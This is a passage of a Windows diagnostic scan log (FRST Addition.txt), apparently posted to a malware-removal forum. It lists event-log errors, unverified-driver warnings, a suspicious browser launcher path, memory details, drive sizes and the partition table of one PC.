Description: Activation of app windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (04/24/2017 05:57:53 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: Yukiha)
Description: Package windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy+microsoft.windows.immersivecontrolpanel was terminated because it took too long to suspend.
Error: (04/24/2017 05:57:48 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2486) (User: Yukiha)
Description: App windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy+microsoft.windows.immersivecontrolpanel did not launch within its allotted time.
Error: (04/24/2017 05:55:27 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: nvstreamsvc.exe, version: 1.7.306.0, time stamp: 0x52dd3a57
Faulting module name: ntdll.dll, version: 6.3.9600.18233, time stamp: 0x56bb4ebb
Exception code: 0xc0000142
Fault offset: 0x00000000000ecdd0
Faulting process id: 0x1050
Faulting application start time: 0x01d2bcfe3cc82271
Faulting application path: C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
Report Id: 7a82fbf6-28f1-11e7-828b-7429af927dee
Faulting package full name:
Faulting package-relative application ID:
Error: (04/24/2017 04:27:51 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "C:\Users\Mehrad\AppData\Roaming\Browsers\chrome.bat.exe".
Dependent Assembly 57.0.2987.133,language="*",type="win32",version="57.0.2987.133" could not be found.
Please use sxstrace.exe for detailed diagnosis.
Error: (04/24/2017 04:21:38 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: IEXPLORE.EXE, version: 11.0.9600.18124, time stamp: 0x5641278d
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x6f6bd2c0
Faulting process id: 0x26b0
Faulting application start time: 0x01d2bc823f5deaca
Faulting application path: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
Faulting module path: unknown
Report Id: 5f3ee885-28e4-11e7-828a-7429af927dee
Faulting package full name:
Faulting package-relative application ID:
System errors:
=============
Error: (04/24/2017 06:52:52 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Windows Management Service service failed to start due to the following error:
The service did not respond to the start or control request in a timely fashion.
Error: (04/24/2017 06:52:52 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (60000 milliseconds) while waiting for the Windows Management Service service to connect.
Error: (04/24/2017 06:50:53 PM) (Source: ipnathlp) (EventID: 1233) (User: )
Description: The ICS_IPV6 failed to configure IPv6 stack.
Error: (04/24/2017 06:50:53 PM) (Source: ipnathlp) (EventID: 1233) (User: )
Description: The ICS_IPV6 failed to configure IPv6 stack.
Error: (04/24/2017 06:49:55 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The lirsgt service failed to start due to the following error:
Windows cannot verify the digital signature for this file. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Error: (04/24/2017 06:49:50 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Dataup Service service failed to start due to the following error:
The service did not respond to the start or control request in a timely fashion.
Error: (04/24/2017 06:49:50 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (60000 milliseconds) while waiting for the Dataup Service service to connect.
Error: (04/24/2017 06:49:35 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The COMODO Internet Security Helper Service service failed to start due to the following error:
The requested resource is in use.
Error: (04/24/2017 06:49:32 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The atksgt service failed to start due to the following error:
Windows cannot verify the digital signature for this file. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Error: (04/24/2017 06:48:00 PM) (Source: Win32k) (EventID: 253) (User: )
Description: A pointer device does not have a mandatory coordinate property.
CodeIntegrity:
===================================
Date: 2017-04-24 18:50:34.855
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\guard64.dll because the set of per-page image hashes could not be found on the system.
Date: 2017-04-24 18:50:07.836
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\guard64.dll because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-04-24 18:49:55.098
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\lirsgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-04-24 18:49:32.692
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-04-24 18:09:55.545
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\guard64.dll because the set of per-page image hashes could not be found on the system.
Date: 2017-04-24 18:09:18.392
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\guard64.dll because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-04-24 18:09:14.042
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\lirsgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-04-24 18:09:08.292
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-04-24 17:59:24.688
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\guard64.dll because the set of per-page image hashes could not be found on the system.
Date: 2017-04-24 17:57:29.678
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\guard64.dll because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
==================== Memory info ===========================
Processor: Intel® Core i7-4710HQ CPU @ 2.50GHz
Percentage of memory in use: 20%
Total physical RAM: 16300.36 MB
Available physical RAM: 12890.51 MB
Total Virtual: 40687.36 MB
Available Virtual: 36996.41 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:146.14 GB) (Free:1.69 GB) NTFS
Drive d: (Bank) (Fixed) (Total:394.4 GB) (Free:145.28 GB) NTFS
Drive e: (Games) (Fixed) (Total:390.62 GB) (Free:129.52 GB) NTFS
Drive g: (My Passport) (Fixed) (Total:931.48 GB) (Free:10.95 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: D9FA2484)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=146.1 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=390.6 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=394.4 GB) - (Type=OF Extended)
========================================================
Disk: 1 (MBR Code: Windows XP) (Size: 931.5 GB) (Disk ID: AB6A4EA9)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)
==================== End of Addition.txt ============================
Edited by RKinner, 24 April 2017 - 01:20 PM.